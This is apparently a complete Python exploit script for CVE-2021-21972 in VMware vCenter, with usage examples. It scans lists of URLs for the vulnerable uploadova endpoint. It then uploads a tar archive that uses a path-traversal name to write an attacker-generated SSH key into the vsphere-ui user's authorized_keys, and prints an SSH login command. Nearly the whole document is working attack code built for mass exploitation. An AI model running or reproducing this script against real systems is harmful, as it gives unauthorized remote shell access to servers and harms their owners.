CVE-2021-21972.py

CVE-2021-21972.py

import requests, optparse, concurrent.futures, sys, functools, itertools, tarfile, os, shutil
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
'''
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt  -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS 
Login using 'ssh -i id_rsa [email protected]'
'''

'''
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt  -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972
'''

'''
% python3 /tmp/CVE_2021_21972.py -u https://172.16.164.1  -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972
'''

proxies = {
	'http' : "http://127.0.0.1:8080",
	'https' : "https://127.0.0.1:8080"
}

#proxies = {}

def CVE_2021_21972(url, filename):
	tmpUrl=''
	if url.endswith("/"):
		tmpUrl=url+"ui/vropspluginui/rest/services/uploadova"
	else:
		tmpUrl=url+"/ui/vropspluginui/rest/services/uploadova"
	headers = {"User-Agent": "Mozilla/5.0", "Accept": "application/json"}
	files = {'uploadFile': (filename, open(filename, 'rb'),'application/x-tar')}
	s=requests.post(tmpUrl, proxies=proxies, headers=headers, files=files, verify=False, timeout=30)
	if "SUCCESS" in s.text:
		return url,True
	else:
		return url, False

def checkVuln(url):
	try:
		tmpUrl=''
		if url.endswith("/"):
			tmpUrl=url+"ui/vropspluginui/rest/services/uploadova"
		else:
			tmpUrl=url+"/ui/vropspluginui/rest/services/uploadova"
		headers = {"User-Agent": "Mozilla/5.0", "Accept": "application/json"}
		s=requests.post(tmpUrl, proxies=proxies, headers=headers, verify=False, timeout=30)
		if "Required CommonsMultipartFile parameter 'uploadFile' is not present" in s.text:
			return url,True
		else:
			return url,False
	except requests.exceptions.ReadTimeout:
		return url,False

def createTar():
	if os.path.exists("id_rsa"):
		os.remove("id_rsa")
	cmd = "ssh-keygen -t rsa -f id_rsa -q -N ''"
	os.system(cmd)
	shutil.copyfile("id_rsa", "authorized_keys")
	tmpPath="../../../../../home/vsphere-ui/.ssh/authorized_keys"
	fname="tmp.tar"
	print("[*] Creating " + fname + " containing " + tmpPath)
	tf = tarfile.open(fname, "a")
	tf.add("authorized_keys", tmpPath)
	tf.close()
	return(fname)
	
parser = optparse.OptionParser()
parser.add_option('-i',action="store", dest="file", help="file containing list of urls")
parser.add_option('-u', '--url', action="store", dest="url", help="https://1.1.1.1")
parser.add_option('-f', action="store", dest="filename")
parser.add_option('-n', action="store", dest="noOfThreads")
parser.add_option('-e', '--exploit', action="store_true")
parser.add_option('-c', '--check', action="store_true")
options, remainder = parser.parse_args()

if options.exploit:
	if options.filename:
		filename=options.filename
	else:
		filename=createTar()
	
noOfThreads=4
if options.noOfThreads:
	noOfThreads=int(options.noOfThreads)
urlList=[]
if options.url:
	urlList.append(options.url)
if options.file:
	tmpUrlList=[]
	with open(options.file) as f:
		urlList = f.readlines()
	for x in urlList:
		x=x.strip()
		tmpUrlList.append(x)
	urlList=tmpUrlList
if not options.check and not options.exploit:
	print("[-] Please choose either the --exploit or --check option")
if options.check:
	with concurrent.futures.ThreadPoolExecutor(max_workers=noOfThreads) as executor:
		for res in executor.map(checkVuln, urlList):				
			if res[1]==True:
				print("[+] "+res[0]+" is vulnerable to CVE-2021-21972")	
if options.exploit:
	sucess=False
	with concurrent.futures.ThreadPoolExecutor(max_workers=noOfThreads) as executor:
		for res in executor.map(CVE_2021_21972, urlList, itertools.repeat(filename)):
			if res[1]==True:
				print("[+] "+res[0]+" SUCCESS ")	
				success=True
	if success==True:
		print("\nLogin using 'ssh -i id_rsa [email protected]'")